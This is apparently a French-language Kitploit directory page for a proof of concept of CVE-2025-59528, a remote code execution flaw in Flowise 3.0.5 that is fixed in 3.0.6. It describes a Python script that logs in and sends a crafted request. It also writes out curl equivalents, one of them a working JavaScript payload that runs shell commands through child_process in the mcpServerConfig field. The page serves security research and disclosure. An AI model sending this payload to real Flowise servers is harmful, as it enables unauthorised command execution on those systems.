Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 Preuve de concept | Kitploit
Outils/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 Preuve de concept

Voir le dépôt
141il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59528 Preuve de concept

Script Python de preuve de concept pour déclencher le chemin RCE CustomMCP de Flowise via POST /api/v1/node-load-method/customMCP.

⚠️ À des fins éducatives et de recherche en sécurité autorisée uniquement. L'exécution de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite de tester est illégale.

Crédits

  • im-soohyun (Kim SooHyun)

Détails

  • Preuve de concept pour CVE-2025-59528
  • Version affectée : Flowise 3.0.5
  • Version corrigée : Flowise 3.0.6
  • Référence : https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

Fichiers

  • poc.py : demande l'URL/IP de la machine, le protocole optionnel si hôte/IP nue utilisée, l'email, le mot de passe et la commande ; se connecte, réutilise les cookies, puis envoie une requête CustomMCP conçue et affiche le statut HTTP, les en-têtes et le corps de la réponse similaire à curl -i

Utilisation

Exécutez :

python3 poc.py

Ensuite fournissez :

  • l'URL/IP de la machine, comme 10.10.11.10, http://10.10.11.10 ou https://target.example
  • le protocole si demandé pour un hôte/IP nue
  • l'adresse e-mail
  • le mot de passe pour un compte sur l'instance Flowise cible
  • la commande à exécuter sur le serveur

Équivalent curl

1ère Requête

curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

2ème Requête

curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
Télécharger l’outil